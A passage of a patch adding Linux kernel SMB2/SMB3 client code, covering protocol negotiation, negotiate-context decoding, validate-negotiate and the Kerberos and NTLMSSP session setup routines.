++		pr_warn_once("Invalid signing algorithm count\n");
++		return;
++	}
++	if (le16_to_cpu(pctxt->SigningAlgorithms[0]) > 2) {
++		pr_warn_once("unknown signing algorithm\n");
++		return;
++	}
++
++	server->signing_negotiated = true;
++	server->signing_algorithm = le16_to_cpu(pctxt->SigningAlgorithms[0]);
++	cifs_dbg(FYI, "signing algorithm %d chosen\n",
++		     server->signing_algorithm);
++}
++
++
++static int smb311_decode_neg_context(struct smb2_negotiate_rsp *rsp,
++				     struct TCP_Server_Info *server,
++				     unsigned int len_of_smb)
++{
++	struct smb2_neg_context *pctx;
++	unsigned int offset = le32_to_cpu(rsp->NegotiateContextOffset);
++	unsigned int ctxt_cnt = le16_to_cpu(rsp->NegotiateContextCount);
++	unsigned int len_of_ctxts, i;
++	int rc = 0;
++
++	cifs_dbg(FYI, "decoding %d negotiate contexts\n", ctxt_cnt);
++	if (len_of_smb <= offset) {
++		cifs_server_dbg(VFS, "Invalid response: negotiate context offset\n");
++		return -EINVAL;
++	}
++
++	len_of_ctxts = len_of_smb - offset;
++
++	for (i = 0; i < ctxt_cnt; i++) {
++		int clen;
++		/* check that offset is not beyond end of SMB */
++		if (len_of_ctxts < sizeof(struct smb2_neg_context))
++			break;
++
++		pctx = (struct smb2_neg_context *)(offset + (char *)rsp);
++		clen = sizeof(struct smb2_neg_context)
++			+ le16_to_cpu(pctx->DataLength);
++		/*
++		 * 2.2.4 SMB2 NEGOTIATE Response
++		 * Subsequent negotiate contexts MUST appear at the first 8-byte
++		 * aligned offset following the previous negotiate context.
++		 */
++		if (i + 1 != ctxt_cnt)
++			clen = ALIGN(clen, 8);
++		if (clen > len_of_ctxts)
++			break;
++
++		if (pctx->ContextType == SMB2_PREAUTH_INTEGRITY_CAPABILITIES)
++			decode_preauth_context(
++				(struct smb2_preauth_neg_context *)pctx);
++		else if (pctx->ContextType == SMB2_ENCRYPTION_CAPABILITIES)
++			rc = decode_encrypt_ctx(server,
++				(struct smb2_encryption_neg_context *)pctx);
++		else if (pctx->ContextType == SMB2_COMPRESSION_CAPABILITIES)
++			decode_compress_ctx(server,
++				(struct smb2_compression_capabilities_context *)pctx);
++		else if (pctx->ContextType == SMB2_POSIX_EXTENSIONS_AVAILABLE)
++			server->posix_ext_supported = true;
++		else if (pctx->ContextType == SMB2_SIGNING_CAPABILITIES)
++			decode_signing_ctx(server,
++				(struct smb2_signing_capabilities *)pctx);
++		else
++			cifs_server_dbg(VFS, "unknown negcontext of type %d ignored\n",
++				le16_to_cpu(pctx->ContextType));
++		if (rc)
++			break;
++
++		offset += clen;
++		len_of_ctxts -= clen;
++	}
++	return rc;
++}
++
++static struct create_posix *
++create_posix_buf(umode_t mode)
++{
++	struct create_posix *buf;
++
++	buf = kzalloc(sizeof(struct create_posix),
++			GFP_KERNEL);
++	if (!buf)
++		return NULL;
++
++	buf->ccontext.DataOffset =
++		cpu_to_le16(offsetof(struct create_posix, Mode));
++	buf->ccontext.DataLength = cpu_to_le32(4);
++	buf->ccontext.NameOffset =
++		cpu_to_le16(offsetof(struct create_posix, Name));
++	buf->ccontext.NameLength = cpu_to_le16(16);
++
++	/* SMB2_CREATE_TAG_POSIX is "0x93AD25509CB411E7B42383DE968BCD7C" */
++	buf->Name[0] = 0x93;
++	buf->Name[1] = 0xAD;
++	buf->Name[2] = 0x25;
++	buf->Name[3] = 0x50;
++	buf->Name[4] = 0x9C;
++	buf->Name[5] = 0xB4;
++	buf->Name[6] = 0x11;
++	buf->Name[7] = 0xE7;
++	buf->Name[8] = 0xB4;
++	buf->Name[9] = 0x23;
++	buf->Name[10] = 0x83;
++	buf->Name[11] = 0xDE;
++	buf->Name[12] = 0x96;
++	buf->Name[13] = 0x8B;
++	buf->Name[14] = 0xCD;
++	buf->Name[15] = 0x7C;
++	buf->Mode = cpu_to_le32(mode);
++	cifs_dbg(FYI, "mode on posix create 0%o\n", mode);
++	return buf;
++}
++
++static int
++add_posix_context(struct kvec *iov, unsigned int *num_iovec, umode_t mode)
++{
++	struct smb2_create_req *req = iov[0].iov_base;
++	unsigned int num = *num_iovec;
++
++	iov[num].iov_base = create_posix_buf(mode);
++	if (mode == ACL_NO_MODE)
++		cifs_dbg(FYI, "Invalid mode\n");
++	if (iov[num].iov_base == NULL)
++		return -ENOMEM;
++	iov[num].iov_len = sizeof(struct create_posix);
++	if (!req->CreateContextsOffset)
++		req->CreateContextsOffset = cpu_to_le32(
++				sizeof(struct smb2_create_req) +
++				iov[num - 1].iov_len);
++	le32_add_cpu(&req->CreateContextsLength, sizeof(struct create_posix));
++	*num_iovec = num + 1;
++	return 0;
++}
++
++
++/*
++ *
++ *	SMB2 Worker functions follow:
++ *
++ *	The general structure of the worker functions is:
++ *	1) Call smb2_init (assembles SMB2 header)
++ *	2) Initialize SMB2 command specific fields in fixed length area of SMB
++ *	3) Call smb_sendrcv2 (sends request on socket and waits for response)
++ *	4) Decode SMB2 command specific fields in the fixed length area
++ *	5) Decode variable length data area (if any for this SMB2 command type)
++ *	6) Call free smb buffer
++ *	7) return
++ *
++ */
++
++int
++SMB2_negotiate(const unsigned int xid,
++	       struct cifs_ses *ses,
++	       struct TCP_Server_Info *server)
++{
++	struct smb_rqst rqst;
++	struct smb2_negotiate_req *req;
++	struct smb2_negotiate_rsp *rsp;
++	struct kvec iov[1];
++	struct kvec rsp_iov;
++	int rc;
++	int resp_buftype;
++	int blob_offset, blob_length;
++	char *security_blob;
++	int flags = CIFS_NEG_OP;
++	unsigned int total_len;
++
++	cifs_dbg(FYI, "Negotiate protocol\n");
++
++	if (!server) {
++		WARN(1, "%s: server is NULL!\n", __func__);
++		return -EIO;
++	}
++
++	rc = smb2_plain_req_init(SMB2_NEGOTIATE, NULL, server,
++				 (void **) &req, &total_len);
++	if (rc)
++		return rc;
++
++	req->hdr.SessionId = 0;
++
++	memset(server->preauth_sha_hash, 0, SMB2_PREAUTH_HASH_SIZE);
++	memset(ses->preauth_sha_hash, 0, SMB2_PREAUTH_HASH_SIZE);
++
++	if (strcmp(server->vals->version_string,
++		   SMB3ANY_VERSION_STRING) == 0) {
++		req->Dialects[0] = cpu_to_le16(SMB30_PROT_ID);
++		req->Dialects[1] = cpu_to_le16(SMB302_PROT_ID);
++		req->Dialects[2] = cpu_to_le16(SMB311_PROT_ID);
++		req->DialectCount = cpu_to_le16(3);
++		total_len += 6;
++	} else if (strcmp(server->vals->version_string,
++		   SMBDEFAULT_VERSION_STRING) == 0) {
++		req->Dialects[0] = cpu_to_le16(SMB21_PROT_ID);
++		req->Dialects[1] = cpu_to_le16(SMB30_PROT_ID);
++		req->Dialects[2] = cpu_to_le16(SMB302_PROT_ID);
++		req->Dialects[3] = cpu_to_le16(SMB311_PROT_ID);
++		req->DialectCount = cpu_to_le16(4);
++		total_len += 8;
++	} else {
++		/* otherwise send specific dialect */
++		req->Dialects[0] = cpu_to_le16(server->vals->protocol_id);
++		req->DialectCount = cpu_to_le16(1);
++		total_len += 2;
++	}
++
++	/* only one of SMB2 signing flags may be set in SMB2 request */
++	if (ses->sign)
++		req->SecurityMode = cpu_to_le16(SMB2_NEGOTIATE_SIGNING_REQUIRED);
++	else if (global_secflags & CIFSSEC_MAY_SIGN)
++		req->SecurityMode = cpu_to_le16(SMB2_NEGOTIATE_SIGNING_ENABLED);
++	else
++		req->SecurityMode = 0;
++
++	req->Capabilities = cpu_to_le32(server->vals->req_capabilities);
++	if (ses->chan_max > 1)
++		req->Capabilities |= cpu_to_le32(SMB2_GLOBAL_CAP_MULTI_CHANNEL);
++
++	/* ClientGUID must be zero for SMB2.02 dialect */
++	if (server->vals->protocol_id == SMB20_PROT_ID)
++		memset(req->ClientGUID, 0, SMB2_CLIENT_GUID_SIZE);
++	else {
++		memcpy(req->ClientGUID, server->client_guid,
++			SMB2_CLIENT_GUID_SIZE);
++		if ((server->vals->protocol_id == SMB311_PROT_ID) ||
++		    (strcmp(server->vals->version_string,
++		     SMB3ANY_VERSION_STRING) == 0) ||
++		    (strcmp(server->vals->version_string,
++		     SMBDEFAULT_VERSION_STRING) == 0))
++			assemble_neg_contexts(req, server, &total_len);
++	}
++	iov[0].iov_base = (char *)req;
++	iov[0].iov_len = total_len;
++
++	memset(&rqst, 0, sizeof(struct smb_rqst));
++	rqst.rq_iov = iov;
++	rqst.rq_nvec = 1;
++
++	rc = cifs_send_recv(xid, ses, server,
++			    &rqst, &resp_buftype, flags, &rsp_iov);
++	cifs_small_buf_release(req);
++	rsp = (struct smb2_negotiate_rsp *)rsp_iov.iov_base;
++	/*
++	 * No tcon so can't do
++	 * cifs_stats_inc(&tcon->stats.smb2_stats.smb2_com_fail[SMB2...]);
++	 */
++	if (rc == -EOPNOTSUPP) {
++		cifs_server_dbg(VFS, "Dialect not supported by server. Consider  specifying vers=1.0 or vers=2.0 on mount for accessing older servers\n");
++		goto neg_exit;
++	} else if (rc != 0)
++		goto neg_exit;
++
++	rc = -EIO;
++	if (strcmp(server->vals->version_string,
++		   SMB3ANY_VERSION_STRING) == 0) {
++		if (rsp->DialectRevision == cpu_to_le16(SMB20_PROT_ID)) {
++			cifs_server_dbg(VFS,
++				"SMB2 dialect returned but not requested\n");
++			goto neg_exit;
++		} else if (rsp->DialectRevision == cpu_to_le16(SMB21_PROT_ID)) {
++			cifs_server_dbg(VFS,
++				"SMB2.1 dialect returned but not requested\n");
++			goto neg_exit;
++		} else if (rsp->DialectRevision == cpu_to_le16(SMB311_PROT_ID)) {
++			/* ops set to 3.0 by default for default so update */
++			server->ops = &smb311_operations;
++			server->vals = &smb311_values;
++		}
++	} else if (strcmp(server->vals->version_string,
++		   SMBDEFAULT_VERSION_STRING) == 0) {
++		if (rsp->DialectRevision == cpu_to_le16(SMB20_PROT_ID)) {
++			cifs_server_dbg(VFS,
++				"SMB2 dialect returned but not requested\n");
++			goto neg_exit;
++		} else if (rsp->DialectRevision == cpu_to_le16(SMB21_PROT_ID)) {
++			/* ops set to 3.0 by default for default so update */
++			server->ops = &smb21_operations;
++			server->vals = &smb21_values;
++		} else if (rsp->DialectRevision == cpu_to_le16(SMB311_PROT_ID)) {
++			server->ops = &smb311_operations;
++			server->vals = &smb311_values;
++		}
++	} else if (le16_to_cpu(rsp->DialectRevision) !=
++				server->vals->protocol_id) {
++		/* if requested single dialect ensure returned dialect matched */
++		cifs_server_dbg(VFS, "Invalid 0x%x dialect returned: not requested\n",
++				le16_to_cpu(rsp->DialectRevision));
++		goto neg_exit;
++	}
++
++	cifs_dbg(FYI, "mode 0x%x\n", rsp->SecurityMode);
++
++	if (rsp->DialectRevision == cpu_to_le16(SMB20_PROT_ID))
++		cifs_dbg(FYI, "negotiated smb2.0 dialect\n");
++	else if (rsp->DialectRevision == cpu_to_le16(SMB21_PROT_ID))
++		cifs_dbg(FYI, "negotiated smb2.1 dialect\n");
++	else if (rsp->DialectRevision == cpu_to_le16(SMB30_PROT_ID))
++		cifs_dbg(FYI, "negotiated smb3.0 dialect\n");
++	else if (rsp->DialectRevision == cpu_to_le16(SMB302_PROT_ID))
++		cifs_dbg(FYI, "negotiated smb3.02 dialect\n");
++	else if (rsp->DialectRevision == cpu_to_le16(SMB311_PROT_ID))
++		cifs_dbg(FYI, "negotiated smb3.1.1 dialect\n");
++	else {
++		cifs_server_dbg(VFS, "Invalid dialect returned by server 0x%x\n",
++				le16_to_cpu(rsp->DialectRevision));
++		goto neg_exit;
++	}
++
++	rc = 0;
++	server->dialect = le16_to_cpu(rsp->DialectRevision);
++
++	/*
++	 * Keep a copy of the hash after negprot. This hash will be
++	 * the starting hash value for all sessions made from this
++	 * server.
++	 */
++	memcpy(server->preauth_sha_hash, ses->preauth_sha_hash,
++	       SMB2_PREAUTH_HASH_SIZE);
++
++	/* SMB2 only has an extended negflavor */
++	server->negflavor = CIFS_NEGFLAVOR_EXTENDED;
++	/* set it to the maximum buffer size value we can send with 1 credit */
++	server->maxBuf = min_t(unsigned int, le32_to_cpu(rsp->MaxTransactSize),
++			       SMB2_MAX_BUFFER_SIZE);
++	server->max_read = le32_to_cpu(rsp->MaxReadSize);
++	server->max_write = le32_to_cpu(rsp->MaxWriteSize);
++	server->sec_mode = le16_to_cpu(rsp->SecurityMode);
++	if ((server->sec_mode & SMB2_SEC_MODE_FLAGS_ALL) != server->sec_mode)
++		cifs_dbg(FYI, "Server returned unexpected security mode 0x%x\n",
++				server->sec_mode);
++	server->capabilities = le32_to_cpu(rsp->Capabilities);
++	/* Internal types */
++	server->capabilities |= SMB2_NT_FIND | SMB2_LARGE_FILES;
++
++	/*
++	 * SMB3.0 supports only 1 cipher and doesn't have a encryption neg context
++	 * Set the cipher type manually.
++	 */
++	if (server->dialect == SMB30_PROT_ID && (server->capabilities & SMB2_GLOBAL_CAP_ENCRYPTION))
++		server->cipher_type = SMB2_ENCRYPTION_AES128_CCM;
++
++	security_blob = smb2_get_data_area_len(&blob_offset, &blob_length,
++					       (struct smb2_hdr *)rsp);
++	/*
++	 * See MS-SMB2 section 2.2.4: if no blob, client picks default which
++	 * for us will be
++	 *	ses->sectype = RawNTLMSSP;
++	 * but for time being this is our only auth choice so doesn't matter.
++	 * We just found a server which sets blob length to zero expecting raw.
++	 */
++	if (blob_length == 0) {
++		cifs_dbg(FYI, "missing security blob on negprot\n");
++		server->sec_ntlmssp = true;
++	}
++
++	rc = cifs_enable_signing(server, ses->sign);
++	if (rc)
++		goto neg_exit;
++	if (blob_length) {
++		rc = decode_negTokenInit(security_blob, blob_length, server);
++		if (rc == 1)
++			rc = 0;
++		else if (rc == 0)
++			rc = -EIO;
++	}
++
++	if (rsp->DialectRevision == cpu_to_le16(SMB311_PROT_ID)) {
++		if (rsp->NegotiateContextCount)
++			rc = smb311_decode_neg_context(rsp, server,
++						       rsp_iov.iov_len);
++		else
++			cifs_server_dbg(VFS, "Missing expected negotiate contexts\n");
++	}
++neg_exit:
++	free_rsp_buf(resp_buftype, rsp);
++	return rc;
++}
++
++int smb3_validate_negotiate(const unsigned int xid, struct cifs_tcon *tcon)
++{
++	int rc;
++	struct validate_negotiate_info_req *pneg_inbuf;
++	struct validate_negotiate_info_rsp *pneg_rsp = NULL;
++	u32 rsplen;
++	u32 inbuflen; /* max of 4 dialects */
++	struct TCP_Server_Info *server = tcon->ses->server;
++
++	cifs_dbg(FYI, "validate negotiate\n");
++
++	/* In SMB3.11 preauth integrity supersedes validate negotiate */
++	if (server->dialect == SMB311_PROT_ID)
++		return 0;
++
++	/*
++	 * validation ioctl must be signed, so no point sending this if we
++	 * can not sign it (ie are not known user).  Even if signing is not
++	 * required (enabled but not negotiated), in those cases we selectively
++	 * sign just this, the first and only signed request on a connection.
++	 * Having validation of negotiate info  helps reduce attack vectors.
++	 */
++	if (tcon->ses->session_flags & SMB2_SESSION_FLAG_IS_GUEST)
++		return 0; /* validation requires signing */
++
++	if (tcon->ses->user_name == NULL) {
++		cifs_dbg(FYI, "Can't validate negotiate: null user mount\n");
++		return 0; /* validation requires signing */
++	}
++
++	if (tcon->ses->session_flags & SMB2_SESSION_FLAG_IS_NULL)
++		cifs_tcon_dbg(VFS, "Unexpected null user (anonymous) auth flag sent by server\n");
++
++	pneg_inbuf = kmalloc(sizeof(*pneg_inbuf), GFP_NOFS);
++	if (!pneg_inbuf)
++		return -ENOMEM;
++
++	pneg_inbuf->Capabilities =
++			cpu_to_le32(server->vals->req_capabilities);
++	if (tcon->ses->chan_max > 1)
++		pneg_inbuf->Capabilities |= cpu_to_le32(SMB2_GLOBAL_CAP_MULTI_CHANNEL);
++
++	memcpy(pneg_inbuf->Guid, server->client_guid,
++					SMB2_CLIENT_GUID_SIZE);
++
++	if (tcon->ses->sign)
++		pneg_inbuf->SecurityMode =
++			cpu_to_le16(SMB2_NEGOTIATE_SIGNING_REQUIRED);
++	else if (global_secflags & CIFSSEC_MAY_SIGN)
++		pneg_inbuf->SecurityMode =
++			cpu_to_le16(SMB2_NEGOTIATE_SIGNING_ENABLED);
++	else
++		pneg_inbuf->SecurityMode = 0;
++
++
++	if (strcmp(server->vals->version_string,
++		SMB3ANY_VERSION_STRING) == 0) {
++		pneg_inbuf->Dialects[0] = cpu_to_le16(SMB30_PROT_ID);
++		pneg_inbuf->Dialects[1] = cpu_to_le16(SMB302_PROT_ID);
++		pneg_inbuf->Dialects[2] = cpu_to_le16(SMB311_PROT_ID);
++		pneg_inbuf->DialectCount = cpu_to_le16(3);
++		/* SMB 2.1 not included so subtract one dialect from len */
++		inbuflen = sizeof(*pneg_inbuf) -
++				(sizeof(pneg_inbuf->Dialects[0]));
++	} else if (strcmp(server->vals->version_string,
++		SMBDEFAULT_VERSION_STRING) == 0) {
++		pneg_inbuf->Dialects[0] = cpu_to_le16(SMB21_PROT_ID);
++		pneg_inbuf->Dialects[1] = cpu_to_le16(SMB30_PROT_ID);
++		pneg_inbuf->Dialects[2] = cpu_to_le16(SMB302_PROT_ID);
++		pneg_inbuf->Dialects[3] = cpu_to_le16(SMB311_PROT_ID);
++		pneg_inbuf->DialectCount = cpu_to_le16(4);
++		/* structure is big enough for 4 dialects */
++		inbuflen = sizeof(*pneg_inbuf);
++	} else {
++		/* otherwise specific dialect was requested */
++		pneg_inbuf->Dialects[0] =
++			cpu_to_le16(server->vals->protocol_id);
++		pneg_inbuf->DialectCount = cpu_to_le16(1);
++		/* structure is big enough for 4 dialects, sending only 1 */
++		inbuflen = sizeof(*pneg_inbuf) -
++				sizeof(pneg_inbuf->Dialects[0]) * 3;
++	}
++
++	rc = SMB2_ioctl(xid, tcon, NO_FILE_ID, NO_FILE_ID,
++		FSCTL_VALIDATE_NEGOTIATE_INFO,
++		(char *)pneg_inbuf, inbuflen, CIFSMaxBufSize,
++		(char **)&pneg_rsp, &rsplen);
++	if (rc == -EOPNOTSUPP) {
++		/*
++		 * Old Windows versions or Netapp SMB server can return
++		 * not supported error. Client should accept it.
++		 */
++		cifs_tcon_dbg(VFS, "Server does not support validate negotiate\n");
++		rc = 0;
++		goto out_free_inbuf;
++	} else if (rc != 0) {
++		cifs_tcon_dbg(VFS, "validate protocol negotiate failed: %d\n",
++			      rc);
++		rc = -EIO;
++		goto out_free_inbuf;
++	}
++
++	rc = -EIO;
++	if (rsplen != sizeof(*pneg_rsp)) {
++		cifs_tcon_dbg(VFS, "Invalid protocol negotiate response size: %d\n",
++			      rsplen);
++
++		/* relax check since Mac returns max bufsize allowed on ioctl */
++		if (rsplen > CIFSMaxBufSize || rsplen < sizeof(*pneg_rsp))
++			goto out_free_rsp;
++	}
++
++	/* check validate negotiate info response matches what we got earlier */
++	if (pneg_rsp->Dialect != cpu_to_le16(server->dialect))
++		goto vneg_out;
++
++	if (pneg_rsp->SecurityMode != cpu_to_le16(server->sec_mode))
++		goto vneg_out;
++
++	/* do not validate server guid because not saved at negprot time yet */
++
++	if ((le32_to_cpu(pneg_rsp->Capabilities) | SMB2_NT_FIND |
++	      SMB2_LARGE_FILES) != server->capabilities)
++		goto vneg_out;
++
++	/* validate negotiate successful */
++	rc = 0;
++	cifs_dbg(FYI, "validate negotiate info successful\n");
++	goto out_free_rsp;
++
++vneg_out:
++	cifs_tcon_dbg(VFS, "protocol revalidation - security settings mismatch\n");
++out_free_rsp:
++	kfree(pneg_rsp);
++out_free_inbuf:
++	kfree(pneg_inbuf);
++	return rc;
++}
++
++enum securityEnum
++smb2_select_sectype(struct TCP_Server_Info *server, enum securityEnum requested)
++{
++	switch (requested) {
++	case Kerberos:
++	case RawNTLMSSP:
++		return requested;
++	case NTLMv2:
++		return RawNTLMSSP;
++	case Unspecified:
++		if (server->sec_ntlmssp &&
++			(global_secflags & CIFSSEC_MAY_NTLMSSP))
++			return RawNTLMSSP;
++		if ((server->sec_kerberos || server->sec_mskerberos) &&
++			(global_secflags & CIFSSEC_MAY_KRB5))
++			return Kerberos;
++		fallthrough;
++	default:
++		return Unspecified;
++	}
++}
++
++struct SMB2_sess_data {
++	unsigned int xid;
++	struct cifs_ses *ses;
++	struct TCP_Server_Info *server;
++	struct nls_table *nls_cp;
++	void (*func)(struct SMB2_sess_data *);
++	int result;
++	u64 previous_session;
++
++	/* we will send the SMB in three pieces:
++	 * a fixed length beginning part, an optional
++	 * SPNEGO blob (which can be zero length), and a
++	 * last part which will include the strings
++	 * and rest of bcc area. This allows us to avoid
++	 * a large buffer 17K allocation
++	 */
++	int buf0_type;
++	struct kvec iov[2];
++};
++
++static int
++SMB2_sess_alloc_buffer(struct SMB2_sess_data *sess_data)
++{
++	int rc;
++	struct cifs_ses *ses = sess_data->ses;
++	struct TCP_Server_Info *server = sess_data->server;
++	struct smb2_sess_setup_req *req;
++	unsigned int total_len;
++	bool is_binding = false;
++
++	rc = smb2_plain_req_init(SMB2_SESSION_SETUP, NULL, server,
++				 (void **) &req,
++				 &total_len);
++	if (rc)
++		return rc;
++
++	spin_lock(&ses->ses_lock);
++	is_binding = (ses->ses_status == SES_GOOD);
++	spin_unlock(&ses->ses_lock);
++
++	if (is_binding) {
++		req->hdr.SessionId = cpu_to_le64(ses->Suid);
++		req->hdr.Flags |= SMB2_FLAGS_SIGNED;
++		req->PreviousSessionId = 0;
++		req->Flags = SMB2_SESSION_REQ_FLAG_BINDING;
++		cifs_dbg(FYI, "Binding to sess id: %llx\n", ses->Suid);
++	} else {
++		/* First session, not a reauthenticate */
++		req->hdr.SessionId = 0;
++		/*
++		 * if reconnect, we need to send previous sess id
++		 * otherwise it is 0
++		 */
++		req->PreviousSessionId = cpu_to_le64(sess_data->previous_session);
++		req->Flags = 0; /* MBZ */
++		cifs_dbg(FYI, "Fresh session. Previous: %llx\n",
++			 sess_data->previous_session);
++	}
++
++	/* enough to enable echos and oplocks and one max size write */
++	req->hdr.CreditRequest = cpu_to_le16(130);
++
++	/* only one of SMB2 signing flags may be set in SMB2 request */
++	if (server->sign)
++		req->SecurityMode = SMB2_NEGOTIATE_SIGNING_REQUIRED;
++	else if (global_secflags & CIFSSEC_MAY_SIGN) /* one flag unlike MUST_ */
++		req->SecurityMode = SMB2_NEGOTIATE_SIGNING_ENABLED;
++	else
++		req->SecurityMode = 0;
++
++#ifdef CONFIG_CIFS_DFS_UPCALL
++	req->Capabilities = cpu_to_le32(SMB2_GLOBAL_CAP_DFS);
++#else
++	req->Capabilities = 0;
++#endif /* DFS_UPCALL */
++
++	req->Channel = 0; /* MBZ */
++
++	sess_data->iov[0].iov_base = (char *)req;
++	/* 1 for pad */
++	sess_data->iov[0].iov_len = total_len - 1;
++	/*
++	 * This variable will be used to clear the buffer
++	 * allocated above in case of any error in the calling function.
++	 */
++	sess_data->buf0_type = CIFS_SMALL_BUFFER;
++
++	return 0;
++}
++
++static void
++SMB2_sess_free_buffer(struct SMB2_sess_data *sess_data)
++{
++	struct kvec *iov = sess_data->iov;
++
++	/* iov[1] is already freed by caller */
++	if (sess_data->buf0_type != CIFS_NO_BUFFER && iov[0].iov_base)
++		memzero_explicit(iov[0].iov_base, iov[0].iov_len);
++
++	free_rsp_buf(sess_data->buf0_type, iov[0].iov_base);
++	sess_data->buf0_type = CIFS_NO_BUFFER;
++}
++
++static int
++SMB2_sess_sendreceive(struct SMB2_sess_data *sess_data)
++{
++	int rc;
++	struct smb_rqst rqst;
++	struct smb2_sess_setup_req *req = sess_data->iov[0].iov_base;
++	struct kvec rsp_iov = { NULL, 0 };
++
++	/* Testing shows that buffer offset must be at location of Buffer[0] */
++	req->SecurityBufferOffset =
++		cpu_to_le16(sizeof(struct smb2_sess_setup_req) - 1 /* pad */);
++	req->SecurityBufferLength = cpu_to_le16(sess_data->iov[1].iov_len);
++
++	memset(&rqst, 0, sizeof(struct smb_rqst));
++	rqst.rq_iov = sess_data->iov;
++	rqst.rq_nvec = 2;
++
++	/* BB add code to build os and lm fields */
++	rc = cifs_send_recv(sess_data->xid, sess_data->ses,
++			    sess_data->server,
++			    &rqst,
++			    &sess_data->buf0_type,
++			    CIFS_LOG_ERROR | CIFS_SESS_OP, &rsp_iov);
++	cifs_small_buf_release(sess_data->iov[0].iov_base);
++	memcpy(&sess_data->iov[0], &rsp_iov, sizeof(struct kvec));
++
++	return rc;
++}
++
++static int
++SMB2_sess_establish_session(struct SMB2_sess_data *sess_data)
++{
++	int rc = 0;
++	struct cifs_ses *ses = sess_data->ses;
++	struct TCP_Server_Info *server = sess_data->server;
++
++	cifs_server_lock(server);
++	if (server->ops->generate_signingkey) {
++		rc = server->ops->generate_signingkey(ses, server);
++		if (rc) {
++			cifs_dbg(FYI,
++				"SMB3 session key generation failed\n");
++			cifs_server_unlock(server);
++			return rc;
++		}
++	}
++	if (!server->session_estab) {
++		server->sequence_number = 0x2;
++		server->session_estab = true;
++	}
++	cifs_server_unlock(server);
++
++	cifs_dbg(FYI, "SMB2/3 session established successfully\n");
++	return rc;
++}
++
++#ifdef CONFIG_CIFS_UPCALL
++static void
++SMB2_auth_kerberos(struct SMB2_sess_data *sess_data)
++{
++	int rc;
++	struct cifs_ses *ses = sess_data->ses;
++	struct TCP_Server_Info *server = sess_data->server;
++	struct cifs_spnego_msg *msg;
++	struct key *spnego_key = NULL;
++	struct smb2_sess_setup_rsp *rsp = NULL;
++	bool is_binding = false;
++
++	rc = SMB2_sess_alloc_buffer(sess_data);
++	if (rc)
++		goto out;
++
++	spnego_key = cifs_get_spnego_key(ses, server);
++	if (IS_ERR(spnego_key)) {
++		rc = PTR_ERR(spnego_key);
++		if (rc == -ENOKEY)
++			cifs_dbg(VFS, "Verify user has a krb5 ticket and keyutils is installed\n");
++		spnego_key = NULL;
++		goto out;
++	}
++
++	msg = spnego_key->payload.data[0];
++	/*
++	 * check version field to make sure that cifs.upcall is
++	 * sending us a response in an expected form
++	 */
++	if (msg->version != CIFS_SPNEGO_UPCALL_VERSION) {
++		cifs_dbg(VFS, "bad cifs.upcall version. Expected %d got %d\n",
++			 CIFS_SPNEGO_UPCALL_VERSION, msg->version);
++		rc = -EKEYREJECTED;
++		goto out_put_spnego_key;
++	}
++
++	spin_lock(&ses->ses_lock);
++	is_binding = (ses->ses_status == SES_GOOD);
++	spin_unlock(&ses->ses_lock);
++
++	/* keep session key if binding */
++	if (!is_binding) {
++		kfree_sensitive(ses->auth_key.response);
++		ses->auth_key.response = kmemdup(msg->data, msg->sesskey_len,
++						 GFP_KERNEL);
++		if (!ses->auth_key.response) {
++			cifs_dbg(VFS, "Kerberos can't allocate (%u bytes) memory\n",
++				 msg->sesskey_len);
++			rc = -ENOMEM;
++			goto out_put_spnego_key;
++		}
++		ses->auth_key.len = msg->sesskey_len;
++	}
++
++	sess_data->iov[1].iov_base = msg->data + msg->sesskey_len;
++	sess_data->iov[1].iov_len = msg->secblob_len;
++
++	rc = SMB2_sess_sendreceive(sess_data);
++	if (rc)
++		goto out_put_spnego_key;
++
++	rsp = (struct smb2_sess_setup_rsp *)sess_data->iov[0].iov_base;
++	/* keep session id and flags if binding */
++	if (!is_binding) {
++		ses->Suid = le64_to_cpu(rsp->hdr.SessionId);
++		ses->session_flags = le16_to_cpu(rsp->SessionFlags);
++	}
++
++	rc = SMB2_sess_establish_session(sess_data);
++out_put_spnego_key:
++	key_invalidate(spnego_key);
++	key_put(spnego_key);
++	if (rc) {
++		kfree_sensitive(ses->auth_key.response);
++		ses->auth_key.response = NULL;
++		ses->auth_key.len = 0;
++	}
++out:
++	sess_data->result = rc;
++	sess_data->func = NULL;
++	SMB2_sess_free_buffer(sess_data);
++}
++#else
++static void
++SMB2_auth_kerberos(struct SMB2_sess_data *sess_data)
++{
++	cifs_dbg(VFS, "Kerberos negotiated but upcall support disabled!\n");
++	sess_data->result = -EOPNOTSUPP;
++	sess_data->func = NULL;
++}
++#endif
++
++static void
++SMB2_sess_auth_rawntlmssp_authenticate(struct SMB2_sess_data *sess_data);
++
++static void
++SMB2_sess_auth_rawntlmssp_negotiate(struct SMB2_sess_data *sess_data)
++{
++	int rc;
++	struct cifs_ses *ses = sess_data->ses;
++	struct TCP_Server_Info *server = sess_data->server;
++	struct smb2_sess_setup_rsp *rsp = NULL;
++	unsigned char *ntlmssp_blob = NULL;
++	bool use_spnego = false; /* else use raw ntlmssp */
++	u16 blob_length = 0;
++	bool is_binding = false;
++
++	/*
++	 * If memory allocation is successful, caller of this function
++	 * frees it.
++	 */
++	ses->ntlmssp = kmalloc(sizeof(struct ntlmssp_auth), GFP_KERNEL);
++	if (!ses->ntlmssp) {
++		rc = -ENOMEM;
++		goto out_err;
++	}
++	ses->ntlmssp->sesskey_per_smbsess = true;
++
++	rc = SMB2_sess_alloc_buffer(sess_data);
++	if (rc)
++		goto out_err;
++
++	rc = build_ntlmssp_smb3_negotiate_blob(&ntlmssp_blob,
++					  &blob_length, ses, server,
++					  sess_data->nls_cp);
++	if (rc)
++		goto out;
++
++	if (use_spnego) {
++		/* BB eventually need to add this */
++		cifs_dbg(VFS, "spnego not supported for SMB2 yet\n");
++		rc = -EOPNOTSUPP;
++		goto out;
++	}
++	sess_data->iov[1].iov_base = ntlmssp_blob;
++	sess_data->iov[1].iov_len = blob_length;
++
++	rc = SMB2_sess_sendreceive(sess_data);
++	rsp = (struct smb2_sess_setup_rsp *)sess_data->iov[0].iov_base;
++
++	/* If true, rc here is expected and not an error */
++	if (sess_data->buf0_type != CIFS_NO_BUFFER &&
++		rsp->hdr.Status == STATUS_MORE_PROCESSING_REQUIRED)
++		rc = 0;
++
++	if (rc)
++		goto out;
++
++	if (offsetof(struct smb2_sess_setup_rsp, Buffer) !=
++			le16_to_cpu(rsp->SecurityBufferOffset)) {
++		cifs_dbg(VFS, "Invalid security buffer offset %d\n",
++			le16_to_cpu(rsp->SecurityBufferOffset));
++		rc = -EIO;
++		goto out;
++	}
++	rc = decode_ntlmssp_challenge(rsp->Buffer,
++			le16_to_cpu(rsp->SecurityBufferLength), ses);
